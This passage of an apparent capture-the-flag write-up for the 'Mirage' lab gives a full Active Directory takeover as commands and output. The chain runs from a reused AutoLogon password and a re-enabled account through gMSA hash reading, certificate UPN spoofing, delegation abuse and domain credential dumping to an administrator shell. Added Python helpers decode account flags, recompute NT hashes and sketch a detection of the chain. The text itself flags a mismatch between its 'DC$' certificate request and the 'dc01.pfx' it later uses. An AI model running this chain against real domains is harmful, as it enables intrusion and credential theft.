{ user: 'sysadmin', password: 'bb5M0k5XWIGD' }
]
},
'dev': {
jetstream: true,
users: [
{ user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
{ user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
]
}
}
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : MIRAGE
DefaultUserName : mark.bbond
DefaultPassword : 1day@atime

BloodHound
The commands below run as mark.bbond (the AutoLogon credentials found above). They first dump the javier.mmarshall object, which sits under OU=Disabled, then clear ACCOUNTDISABLE, reset its password and clear logonHours, and finally confirm with nxc that the account can obtain a TGT.
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb get object 'JAVIER.MMARSHALL'
distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: javier.mmarshall
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-05-22 21:49:20+00:00
description: Contoso Contractors
displayName: javier.mmarshall
givenName: javier.mmarshall
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-05-25 18:43:57.120180+00:00
lastLogonTimestamp: 2025-05-22 21:45:29.508220+00:00
logonCount: 13
logonHours:
memberOf: CN=IT_Contractors,OU=Groups,OU=Contractors,OU=IT_Staff,DC=mirage,DC=htb
msDS-SupportedEncryptionTypes: 0
nTSecurityDescriptor: O:S-1-5-21-2127163471-3824721834-2568365109-512G:S-1-5-21-2127163471-3824721834-2568365109-512D:AI(OD;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OD;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;037088f8-0ae1-11d2-b422-00a0c968f939;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;WP;bf9679ab-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-2602)(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-517)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;0x30;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;0x30;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a54-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a56-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;;S-1-5-11)(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-11)(OA;;RP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;RP;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b2-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0x20014;;;S-1-5-21-2127163471-3824721834-2568365109-2602)(A;;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;RC;;;S-1-5-11)(A;;0x20094;;;S-1-5-10)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: javier.mmarshall
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=mirage,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: c52e731b-30c1-439c-a6b9-0c2f804e5f08
objectSid: S-1-5-21-2127163471-3824721834-2568365109-1108
primaryGroupID: 513
pwdLastSet: 2025-07-20 17:38:25.576412+00:00
sAMAccountName: javier.mmarshall
sAMAccountType: 805306368
uSNChanged: 159917
uSNCreated: 24655
userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: javier.mmarshall@mirage.htb
whenChanged: 2025-07-20 17:38:25+00:00
whenCreated: 2025-05-02 08:33:11+00:00
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb remove uac "javier.mmarshall" -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from javier.mmarshall's userAccountControl
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb get object 'JAVIER.MMARSHALL' --attr userAccountControl
distinguishedName: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
➜ Mirage bloodyAD --kerberos -d mirage.htb -u mark.bbond -p '1day@atime' --host dc01.mirage.htb set password 'javier.mmarshall' 'NewPass123!'
[+] Password changed successfully!
PS C:\temp> Set-ADUser -Identity "javier.mmarshall" -Clear logonHours

➜ Mirage nxc smb dc01.mirage.htb -u javier.mmarshall -p 'NewPass123!' -k --generate-tgt javier.mmarshall
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\javier.mmarshall:NewPass123!
SMB dc01.mirage.htb 445 dc01 [+] TGT saved to: javier.mmarshall.ccache
SMB dc01.mirage.htb 445 dc01 [+] Run the following command to use the TGT: export KRB5CCNAME=javier.mmarshall.ccache
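Two of the attributes the commands above had to change are easy to misread in raw form. userAccountControl is a bit mask (bloodyAD prints the set bits by name, certipy prints the integer, so 66048 and "NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD" are the same value), and logonHours is a 168-bit mask, one bit per hour of the week in UTC, in which an all-zero value means the account may never log on while an absent attribute means no restriction; that is why the password reset alone was not enough and logonHours had to be cleared. The following Python is added here as an example and is not part of the writeup or of bloodyAD: it decodes both attributes and reports whether an account can log on at a given UTC time. The flag values are the documented ADS_USER_FLAG bits; the bit-to-hour layout assumed for logonHours (Sunday 00:00 UTC first, least-significant bit of each byte first) is an assumption, so only the all-zero and all-ones cases should be taken as certain.

```python
from __future__ import annotations
from datetime import datetime, timezone

# userAccountControl bits (ADS_USER_FLAG_ENUM), the subset that matters here.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
UAC_BY_NAME = {name: bit for bit, name in UAC_FLAGS.items()}
HOURS_PER_WEEK = 168  # logonHours is 21 bytes


def decode_uac(value: int) -> str:
    """Render a userAccountControl integer the way bloodyAD prints it (ascending bit order)."""
    return "; ".join(name for bit, name in sorted(UAC_FLAGS.items()) if value & bit)


def remove_uac_flag(value: int, name: str) -> int:
    """What `bloodyAD remove uac <user> -f <flag>` does to the integer: clear one bit."""
    return value & ~UAC_BY_NAME[name]


def hour_index(when: datetime) -> int:
    """0..167, counting from Sunday 00:00 UTC (assumed layout). Expects an aware datetime."""
    when = when.astimezone(timezone.utc)
    sunday_based_day = (when.weekday() + 1) % 7  # Python: Monday=0 ... Sunday=6 -> 0
    return sunday_based_day * 24 + when.hour


def build_logon_hours(allowed: set[int]) -> bytes:
    """Inverse of decode_logon_hours, for building test masks."""
    mask = bytearray(HOURS_PER_WEEK // 8)
    for i in allowed:
        mask[i // 8] |= 1 << (i % 8)
    return bytes(mask)


def decode_logon_hours(raw: bytes | None) -> set[int] | None:
    """None (attribute absent) means unrestricted; an all-zero mask means never."""
    if raw is None:
        return None
    if len(raw) != HOURS_PER_WEEK // 8:
        raise ValueError("logonHours must be 21 bytes")
    return {i for i in range(HOURS_PER_WEEK) if raw[i // 8] >> (i % 8) & 1}


def can_logon(uac: int, logon_hours: bytes | None, when: datetime) -> tuple[bool, list[str]]:
    """The two gates the writeup had to open, evaluated the way the DC would."""
    reasons = []
    if uac & UAC_BY_NAME["ACCOUNTDISABLE"]:
        reasons.append("userAccountControl has ACCOUNTDISABLE")
    if uac & UAC_BY_NAME["LOCKOUT"]:
        reasons.append("account is locked out")
    allowed = decode_logon_hours(logon_hours)
    if allowed is not None and hour_index(when) not in allowed:
        reasons.append("current UTC hour is outside logonHours")
    return (not reasons, reasons)


if __name__ == "__main__":
    javier_before = 0x10202  # ACCOUNTDISABLE | NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD, as bloodyAD showed
    print(decode_uac(javier_before))
    javier_after = remove_uac_flag(javier_before, "ACCOUNTDISABLE")
    print(javier_after, decode_uac(javier_after))  # 66048, the integer certipy prints for mark.bbond
    now = datetime(2025, 7, 20, 18, 0, tzinfo=timezone.utc)
    print(can_logon(javier_after, bytes(21), now))  # all-zero logonHours: still blocked
    print(can_logon(javier_after, None, now))       # logonHours cleared: allowed
```

Running it reproduces the sequence in the writeup: the flag set before and after `remove uac`, and the account that is enabled yet still unable to log on until logonHours is cleared.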

➜ Mirage bloodyAD -k -d 'mirage.htb' -u 'javier.mmarshall' -p 'NewPass123!' --host dc01.mirage.htb get object 'Mirage-Service$' --attr msDS-ManagedPassword
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866
msDS-ManagedPassword.B64ENCODED: 43A01mr7V2LGukxowctrHCsLubtNUHxw2zYf7l0REqmep3mfMpizCXlvhv0n8SFG/WKSApJsujGp2+unu/xA6F2fLD4H5Oji/mVHYkkf+iwXjf6Z9TbzVkLGELgt/k2PI4rIz600cfYmFq99AN8ZJ9VZQEqRcmQoaRqi51nSfaNRuOVR79CGl/QQcOJv8eV11UgfjwPtx3lHp1cXHIy4UBQu9O0O5W0Qft82GuB3/M7dTM/YiOxkObGdzWweR2k/J+xvj8dsio9QfPb9QxOE18n/ssnlSxEI8BhE7fBliyLGN7x/pw7lqD/dJNzJqZEmBLLVRUbhprzmG29yNSSjog==
➜ Mirage impacket-getTGT 'mirage.htb/mirage-service$' -hashes 'aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in mirage-service$.ccache
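bloodyAD prints two derived forms of msDS-ManagedPassword: the 256-byte CurrentPassword from the MSDS-MANAGEDPASSWORD_BLOB (base64) and its NT hash, which is the value getTGT consumes with -hashes. The example below is added here and is not bloodyAD's or Impacket's code; it shows how that hash is derived: MD4 over the raw password bytes (for a human-chosen password, MD4 over its UTF-16LE encoding, which is the ordinary NT hash). MD4 is implemented from RFC 1320 because hashlib's md4 is usually disabled under OpenSSL 3. The base64 value and the hash are the ones printed above; the RFC test vectors and the NT hash of "password" are used to check the implementation.

```python
import base64
import struct

_M = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, returning the 16-byte digest."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & _M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & _M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + hh(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & _M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & _M for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 of the UTF-16LE password. For a gMSA the CurrentPassword
    buffer in the blob is already UTF-16LE, so it is hashed as-is."""
    return md4(password_utf16le).hex()


def nt_hash_of_str(password: str) -> str:
    return nt_hash(password.encode("utf-16-le"))


def gmsa_ntlm_from_b64(b64_current_password: str) -> str:
    """Reproduce bloodyAD's msDS-ManagedPassword.NTLM from its B64ENCODED output."""
    return nt_hash(base64.b64decode(b64_current_password))


# Values printed by bloodyAD in the writeup for Mirage-Service$.
MIRAGE_SERVICE_B64 = (
    "43A01mr7V2LGukxowctrHCsLubtNUHxw2zYf7l0REqmep3mfMpizCXlvhv0n8SFG/WKSApJsujGp2+unu/xA6F2fLD4H5Oji/mVH"
    "Ykkf+iwXjf6Z9TbzVkLGELgt/k2PI4rIz600cfYmFq99AN8ZJ9VZQEqRcmQoaRqi51nSfaNRuOVR79CGl/QQcOJv8eV11UgfjwPt"
    "x3lHp1cXHIy4UBQu9O0O5W0Qft82GuB3/M7dTM/YiOxkObGdzWweR2k/J+xvj8dsio9QfPb9QxOE18n/ssnlSxEI8BhE7fBliyLG"
    "N7x/pw7lqD/dJNzJqZEmBLLVRUbhprzmG29yNSSjog=="
)
MIRAGE_SERVICE_NTLM = "305806d84f7c1be93a07aaf40f0c7866"

if __name__ == "__main__":
    raw = base64.b64decode(MIRAGE_SERVICE_B64)
    print(len(raw), "bytes of managed password; random, so not crackable, only replayable")
    print("recomputed hash matches bloodyAD:", gmsa_ntlm_from_b64(MIRAGE_SERVICE_B64) == MIRAGE_SERVICE_NTLM)
```

The 256 random bytes are why the gMSA password is never cracked but simply reused: `impacket-getTGT ... -hashes :<NT>` performs RC4-based pre-authentication with the hash, exactly as the next command does.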

➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -user 'mark.bbond' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'mark.bbond':
cn : mark.bbond
distinguishedName : CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
name : mark.bbond
objectSid : S-1-5-21-2127163471-3824721834-2568365109-1109
sAMAccountName : mark.bbond
userPrincipalName : mark.bbond@mirage.htb
userAccountControl : 66048
whenCreated : 2025-05-02T08:36:23+00:00
whenChanged : 2025-07-20T19:07:48+00:00
➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -upn 'DC$@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'mark.bbond':
userPrincipalName : DC$@mirage.htb
[*] Successfully updated 'mark.bbond'
➜ Mirage certipy-ad req -k -dc-ip '10.129.28.136' -dc-host dc01.mirage.htb -target 'dc01.mirage.htb' -ca 'mirage-DC01-CA' -template 'User'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'DC$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc.pfx'
[*] Wrote certificate and private key to 'dc.pfx'
Restore mark.bbond's UPN to its original value, again authenticating as Mirage-Service$. Note that the certificate used for authentication below, dc01.pfx, carries the UPN DC01$@mirage.htb, the sAMAccountName of the domain controller's computer account (CN=DC01,OU=Domain Controllers); the run shown above with 'DC$@mirage.htb' yields a certificate for a principal that matches no account in this domain, so the UPN written to mark.bbond must be DC01$@mirage.htb for the mapping to land on DC01$.
➜ Mirage impacket-getTGT 'mirage.htb/mirage-service$' -hashes 'aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in mirage-service$.ccache
➜ Mirage sudo chmod 600 mirage-service\$.ccache
➜ Mirage export KRB5CCNAME=mirage-service\$.ccache
➜ Mirage klist
Credentials cache: FILE:mirage-service$.ccache
Principal: mirage-service$@MIRAGE.HTB
Issued Expires Principal
Jul 20 20:30:00 2025 Jul 21 06:30:00 2025 krbtgt/MIRAGE.HTB@MIRAGE.HTB
➜ Mirage certipy-ad account -k -no-pass -target dc01.mirage.htb -dc-ip '10.129.28.136' -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Updating user 'mark.bbond':
userPrincipalName : mark.bbond@mirage.htb
[*] Successfully updated 'mark.bbond'
➜ Mirage certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.28.136 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'DC01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.28.136:636'
[*] Authenticated to '10.129.28.136' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# whoami
u:MIRAGE\DC01$
# set_rbcd dc01$ mirage-service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
mirage-service$ can now impersonate users on dc01$ via S4U2Proxy
➜ Mirage impacket-getST mirage.htb/mirage-service\$ -k -no-pass -spn 'cifs/DC01.mirage.htb' -impersonate 'DC01$' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating DC01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
➜ Mirage impacket-secretsdump 'dc01$@dc01.mirage.htb' -k -no-pass -dc-ip 10.129.28.136 -just-dc-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
[*] Kerberos keys grabbed
mirage.htb\Administrator:aes256-cts-hmac-sha1-96:09454bbc6da252ac958d0eaa211293070bce0a567c0e08da5406ad0bce4bdca7
mirage.htb\Administrator:aes128-cts-hmac-sha1-96:47aa953930634377bad3a00da2e36c07
mirage.htb\Administrator:des-cbc-md5:e02a73baa10b8619
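From the defender's side, the chain just completed leaves a distinctive trail in the Security log: a user object receiving a machine-style UPN and getting its old one back shortly after (4738, "A user account was changed", which carries the new User Principal Name), msDS-AllowedToActOnBehalfOfOtherIdentity written on a domain controller object (5136, "A directory service object was modified", which needs directory service change auditing on the DC), and a service ticket issued through S4U2Proxy with the DC's own account as client (4769 with Transited Services populated). The Python below is an added detection sketch, not from the writeup; the events are constructed dicts that use those events' field names, and the timestamps, the two-hour window and the acting account names are assumptions made for the example.

```python
from __future__ import annotations
from datetime import datetime, timedelta

# Constructed events (not real log data): field names follow Security events
# 4738 (user account changed), 5136 (directory object modified) and 4769
# (service ticket requested); times and acting accounts are assumptions.
EVENTS = [
    {"EventID": 4738, "Time": "2025-07-20T19:05:10", "SubjectUserName": "Mirage-Service$",
     "TargetUserName": "mark.bbond", "UserPrincipalName": "DC01$@mirage.htb"},
    {"EventID": 4738, "Time": "2025-07-20T19:07:48", "SubjectUserName": "Mirage-Service$",
     "TargetUserName": "mark.bbond", "UserPrincipalName": "mark.bbond@mirage.htb"},
    {"EventID": 5136, "Time": "2025-07-20T20:35:02", "SubjectUserName": "DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 4769, "Time": "2025-07-20T20:36:40", "TargetUserName": "DC01$@MIRAGE.HTB",
     "ServiceName": "DC01$", "TransmittedServices": "Mirage-Service$@MIRAGE.HTB"},
    # an ordinary ticket for comparison: no S4U chain, must not fire
    {"EventID": 4769, "Time": "2025-07-20T20:36:41", "TargetUserName": "nathan.aadam@MIRAGE.HTB",
     "ServiceName": "DC01$", "TransmittedServices": "-"},
]

CHAIN = ("machine_style_upn", "rbcd_on_dc", "s4u2proxy_as_dc")


def _t(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["Time"])


def _finding(ev: dict, rule: str, subject: str, detail: str) -> dict:
    # 'subject' is the account the attacker ends up acting as, used to join stages
    return {"time": _t(ev), "rule": rule, "subject": subject.upper(), "detail": detail}


def _per_event_rules(ev: dict) -> list[dict]:
    """Stateless rules, one event at a time."""
    out = []
    if ev["EventID"] == 4738:
        upn = ev.get("UserPrincipalName", "-")
        # A user object given the UPN of a computer account (ends in $) is the
        # set-up for the certificate mapping trick used above.
        if "$@" in upn and not ev["TargetUserName"].endswith("$"):
            out.append(_finding(ev, "machine_style_upn", upn.split("@")[0],
                                f"{ev['TargetUserName']} given UPN {upn} by {ev['SubjectUserName']}"))
    elif ev["EventID"] == 5136:
        if (ev["AttributeLDAPDisplayName"].lower() == "msds-allowedtoactonbehalfofotheridentity"
                and "ou=domain controllers" in ev["ObjectDN"].lower()):
            cn = ev["ObjectDN"].split(",")[0].split("=", 1)[1]
            out.append(_finding(ev, "rbcd_on_dc", cn + "$",
                                f"{ev['SubjectUserName']} wrote RBCD on {ev['ObjectDN']}"))
    elif ev["EventID"] == 4769:
        transited = ev.get("TransmittedServices", "-")
        client = ev["TargetUserName"].split("@")[0]
        # TransmittedServices is only populated for S4U2Proxy; a machine account
        # as the impersonated client of its own service is the RBCD abuse shape.
        if transited != "-" and client.endswith("$"):
            out.append(_finding(ev, "s4u2proxy_as_dc", client,
                                f"{transited} obtained {ev['ServiceName']} ticket as {client}"))
    return out


def _upn_flipflops(events: list[dict], window: timedelta) -> list[dict]:
    """Same user gets two different UPN values within the window (set, then restored)."""
    by_user: dict[str, list[dict]] = {}
    for ev in events:
        if ev["EventID"] == 4738 and ev.get("UserPrincipalName", "-") != "-":
            by_user.setdefault(ev["TargetUserName"], []).append(ev)
    out = []
    for user, evs in by_user.items():
        evs.sort(key=_t)
        for a, b in zip(evs, evs[1:]):
            if a["UserPrincipalName"] != b["UserPrincipalName"] and _t(b) - _t(a) <= window:
                out.append(_finding(b, "upn_flipflop", user,
                                    f"{user}: {a['UserPrincipalName']} -> {b['UserPrincipalName']}"))
    return out


def detect(events: list[dict], window: timedelta = timedelta(hours=2)) -> list[dict]:
    findings = [f for ev in events for f in _per_event_rules(ev)]
    findings += _upn_flipflops(events, window)
    findings.sort(key=lambda f: f["time"])
    return findings


def chain_subjects(findings: list[dict], window: timedelta = timedelta(hours=2)) -> set[str]:
    """Subjects for which every stage in CHAIN fired within one window."""
    stages: dict[str, dict[str, list[datetime]]] = {}
    for f in findings:
        if f["rule"] in CHAIN:
            stages.setdefault(f["subject"], {}).setdefault(f["rule"], []).append(f["time"])
    hits = set()
    for subject, by_rule in stages.items():
        if all(rule in by_rule for rule in CHAIN):
            times = [t for ts in by_rule.values() for t in ts]
            if max(times) - min(times) <= window:
                hits.add(subject)
    return hits


if __name__ == "__main__":
    found = detect(EVENTS)
    for f in found:
        print(f["time"], f["rule"], f["subject"], "-", f["detail"])
    print("full chain for:", chain_subjects(found))
```

Each rule is a weak signal on its own (UPN edits and RBCD changes happen legitimately), which is why the stages are joined on the account they converge on, here DC01$, before raising a single alert; the UPN restore is kept as its own finding because it is what makes the account look untouched afterwards.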
➜ Mirage impacket-getTGT 'mirage.htb/administrator' -hashes 'aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3' -dc-ip 10.129.28.136
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
➜ Mirage sudo chmod 600 administrator.ccache
➜ Mirage export KRB5CCNAME=administrator.ccache
➜ Mirage klist -c administrator.ccache
Credentials cache: FILE:administrator.ccache
Principal: administrator@MIRAGE.HTB
Issued Expires Principal
Jul 20 21:40:18 2025 Jul 21 07:40:18 2025 krbtgt/MIRAGE.HTB@MIRAGE.HTB
➜ Mirage evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>